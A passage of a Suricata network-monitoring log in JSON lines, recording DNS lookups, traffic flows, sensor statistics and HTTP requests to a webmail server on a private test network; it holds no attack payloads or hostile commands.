{"timestamp":"2020-02-29T00:01:35.000485+0000","flow_id":43983295356035,"event_type":"flow","src_ip":"192.168.10.122","src_port":46502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:34.269443+0000","end":"2020-02-28T23:56:34.377451+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.000762+0000","flow_id":2204137096906147,"event_type":"flow","src_ip":"192.168.10.122","src_port":40372,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:34.099747+0000","end":"2020-02-28T23:56:34.211348+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.170866+0000","flow_id":679183207983578,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34694,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18979},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:01:36.000552+0000","flow_id":76715215099822,"event_type":"flow","src_ip":"192.168.10.130","src_port":33908,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":54,"pkts_toclient":68,"bytes_toserver":5107,"bytes_toclient":83382,"start":"2020-02-28T23:49:57.202670+0000","end":"2020-02-28T23:51:32.624050+0000","age":95,"state":"established","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1a","tcp_flags_tc":"1f","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"fin_wait2"}} {"timestamp":"2020-02-29T00:01:37.000831+0000","flow_id":1537012727240391,"event_type":"flow","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":8,"bytes_toserver":1283,"bytes_toclient":6321,"start":"2020-02-29T00:00:31.218823+0000","end":"2020-02-29T00:00:36.480214+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:38.000216+0000","event_type":"stats","stats":{"uptime":13750,"capture":{"kernel_packets":132316,"kernel_drops":0},"decoder":{"pkts":132320,"bytes":91877900,"invalid":176,"ipv4":130897,"ipv6":8,"ethernet":132320,"raw":0,"null":0,"sll":0,"tcp":125931,"udp":4776,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2661,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2677,"synack":2668,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2177,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2253}},"flow_mgr":{"closed_pruned":2637,"new_pruned":15,"est_pruned":2231,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":37285,"memcap":0}}} {"timestamp":"2020-02-29T00:01:44.000388+0000","flow_id":2150733489452806,"event_type":"flow","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1393,"bytes_toclient":6321,"start":"2020-02-29T00:00:37.866054+0000","end":"2020-02-29T00:00:43.093966+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:45.000183+0000","event_type":"stats","stats":{"uptime":13757,"capture":{"kernel_packets":132316,"kernel_drops":0},"decoder":{"pkts":132320,"bytes":91877900,"invalid":176,"ipv4":130897,"ipv6":8,"ethernet":132320,"raw":0,"null":0,"sll":0,"tcp":125931,"udp":4776,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2661,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2677,"synack":2668,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2177,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2253}},"flow_mgr":{"closed_pruned":2638,"new_pruned":15,"est_pruned":2231,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":37205,"memcap":0}}} {"timestamp":"2020-02-29T00:01:45.001653+0000","flow_id":452932915956904,"event_type":"flow","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1180,"bytes_toclient":709,"start":"2020-02-29T00:00:16.593064+0000","end":"2020-02-29T00:00:44.595345+0000","age":28,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:46.933558+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57196,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:47.039247+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56014,"proto":"UDP","dns":{"type":"answer","id":57196,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:47.039247+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56014,"proto":"UDP","dns":{"type":"answer","id":57196,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:47.144742+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52259,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23414,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:47.250009+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52259,"proto":"UDP","dns":{"type":"answer","id":23414,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:47.250009+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52259,"proto":"UDP","dns":{"type":"answer","id":23414,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:50.000629+0000","flow_id":1256757506654995,"event_type":"flow","src_ip":"192.168.10.122","src_port":60917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:48.967443+0000","end":"2020-02-28T23:56:49.075802+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:52.000199+0000","event_type":"stats","stats":{"uptime":13764,"capture":{"kernel_packets":132330,"kernel_drops":0},"decoder":{"pkts":132361,"bytes":91905859,"invalid":178,"ipv4":130938,"ipv6":8,"ethernet":132361,"raw":0,"null":0,"sll":0,"tcp":125966,"udp":4780,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2662,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2678,"synack":2669,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":136,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2179,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2255}},"flow_mgr":{"closed_pruned":2640,"new_pruned":15,"est_pruned":2232,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18515,"memcap_state":0,"memcap_global":0},"http":{"memuse":37125,"memcap":0}}} {"timestamp":"2020-02-29T00:01:52.001029+0000","flow_id":2118594249540551,"event_type":"flow","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":16,"bytes_toserver":2706,"bytes_toclient":11394,"start":"2020-02-29T00:00:42.377799+0000","end":"2020-02-29T00:00:51.314644+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:55.000643+0000","flow_id":2239244160873526,"event_type":"flow","src_ip":"192.168.10.122","src_port":46652,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:54.144438+0000","end":"2020-02-28T23:56:54.252490+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:58.221235+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49258,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:58.332439+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56903,"proto":"UDP","dns":{"type":"answer","id":49258,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:58.332439+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56903,"proto":"UDP","dns":{"type":"answer","id":49258,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:58.479290+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7611}} {"timestamp":"2020-02-29T00:01:59.000177+0000","event_type":"stats","stats":{"uptime":13771,"capture":{"kernel_packets":132364,"kernel_drops":0},"decoder":{"pkts":132366,"bytes":91906141,"invalid":178,"ipv4":130941,"ipv6":8,"ethernet":132366,"raw":0,"null":0,"sll":0,"tcp":125969,"udp":4780,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2662,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2678,"synack":2669,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":136,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2179,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2255}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2233,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18514,"memcap_state":0,"memcap_global":0},"http":{"memuse":122658,"memcap":0}}} {"timestamp":"2020-02-29T00:02:01.583898+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41614,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59173,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:01.605340+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7611},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39619,"tx_id":0}} {"timestamp":"2020-02-29T00:02:01.614287+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46582,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:01.695422+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41614,"proto":"UDP","dns":{"type":"answer","id":59173,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:01.695422+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41614,"proto":"UDP","dns":{"type":"answer","id":59173,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:01.726419+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34201,"proto":"UDP","dns":{"type":"answer","id":46582,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:01.726419+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34201,"proto":"UDP","dns":{"type":"answer","id":46582,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:01.772272+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526}} {"timestamp":"2020-02-29T00:02:01.809666+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8785}} {"timestamp":"2020-02-29T00:02:02.054004+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:02:02.063370+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56001,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61179,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:02.174799+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56001,"proto":"UDP","dns":{"type":"answer","id":61179,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:02.174799+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56001,"proto":"UDP","dns":{"type":"answer","id":61179,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:02.260450+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:02:02.260450+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:02:04.735204+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8785},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":35363,"tx_id":0}} {"timestamp":"2020-02-29T00:02:04.750794+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2110,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:04.861699+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59842,"proto":"UDP","dns":{"type":"answer","id":2110,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:04.861699+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59842,"proto":"UDP","dns":{"type":"answer","id":2110,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:04.970705+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:02:04.979571+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26867,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:05.090880+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45990,"proto":"UDP","dns":{"type":"answer","id":26867,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:05.090880+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45990,"proto":"UDP","dns":{"type":"answer","id":26867,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:06.000378+0000","event_type":"stats","stats":{"uptime":13778,"capture":{"kernel_packets":132438,"kernel_drops":0},"decoder":{"pkts":132444,"bytes":91945109,"invalid":179,"ipv4":131019,"ipv6":8,"ethernet":132444,"raw":0,"null":0,"sll":0,"tcp":126035,"udp":4791,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2664,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2680,"synack":2671,"rst":1192,"segment_memcap_dr